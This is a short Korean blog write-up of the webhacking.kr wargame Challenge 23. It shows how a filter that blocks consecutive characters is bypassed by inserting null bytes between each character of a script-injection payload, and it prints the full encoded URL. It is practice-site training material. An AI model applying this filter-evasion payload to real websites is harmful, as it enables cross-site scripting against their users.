[webhacking.kr] Challenge 23

위는 Challenge 23의 초기 화면이다.

script 태그를 주입하는 것이 미션이라고 한다.

 

<script>alert(1);</script>를 입력하고 제출버튼을 눌러주었더니 no hack이라는 문구가 출력되었다.

그리고 url이 다음과 같이 변경되었다.

index.php?code=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

 

몇 개 입력을 해보았더니 문자를 2개 이상 붙여 입력해주면 no hack이라는 문구가 떴다.

 

연속적인 문자열 입력을 막기 위해 null 바이트 (%00)을 글자 사이마다 넣어서 입력해보았다.

index.php?code=%3C%00s%00c%00r%00i%00p%00t%00%3E%00a%00l%00e%00r%00t%00%28%001%00%29%00%3B%00%3C%00%2F%00s%00c%00r%00i%00p%00t%00%3E

 

이를 url에 입력해주었더니 성공할 수 있었다.